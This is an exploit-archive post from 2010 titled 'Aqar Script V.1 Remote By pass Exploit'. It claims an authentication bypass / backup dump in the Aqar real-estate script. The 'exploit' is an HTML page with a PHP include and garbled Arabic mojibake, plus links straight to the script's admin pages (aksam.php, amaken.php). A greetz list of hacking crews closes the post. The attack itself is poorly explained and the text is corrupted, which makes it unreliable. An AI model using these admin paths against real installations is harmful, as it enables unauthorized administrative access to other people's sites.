Aqar Script V.1 Remote By pass Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Aqar Script V.1 Remote By pass Exploit
# Published : 2010-05-11
# Author : indoushka
# Previous Title : 724CMS Enterprise Version 4.59 (section.php) SQL Injection Vulnerability
# Next Title : Digital College 1.0 Upload Vulnerability

========================================================================================
| # Title : Aqar Script V.1 Remote By pass Exploit
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iqs3cur1ty.com/vb
| # Script : Powered By AqarScript
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)
| # Bug : Backup Dump
====================== Exploit By indoushka =================================
# Exploit :

<html dir=rtl>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<body>
<table border="0" cellspacing="5" cellpadding="0">
<tr>
<td width="100%" colspan="3" valign="top" align="right">
<h1>á?íé ?áêí?? - úT?? ó??íèê</h1>
</td>
<td width="100%" valign="top" align="right">
</td>
</tr>
<tr>
<td valign="top" align="right" nowrap>
<?php
include("./qa2ema.php");
?>
</td>
<meta http-equiv="Content-Language" content="ar-eg">
<td valign="top" align="right"><font face="Tahoma">??á?e è? Yì á?íé
?áêí?? ?á???é èúT?? ó??íèê<br>
?? ??á ?áá? ???íé ???Yé ????? ???Yíé Yì ?Yíé ?á???Yé <br>
óê??? ??ì??é Yì ?á?ó?é 2<br>
<br>
<b><font size="1">?ú êíí?ê ??í? ?ê</font></b></font>
</tr>
</table>
</body>
<ul>
<li><a href="http://127.0.0.1/Aqar/admin/aksam.php">?á?Tó??</a></li>
<li><a href="http://127.0.0.1/Aqar/admin/amaken.php">?á????? ?á???Yíé</a></li>
</ul>
</html>

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team : (loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------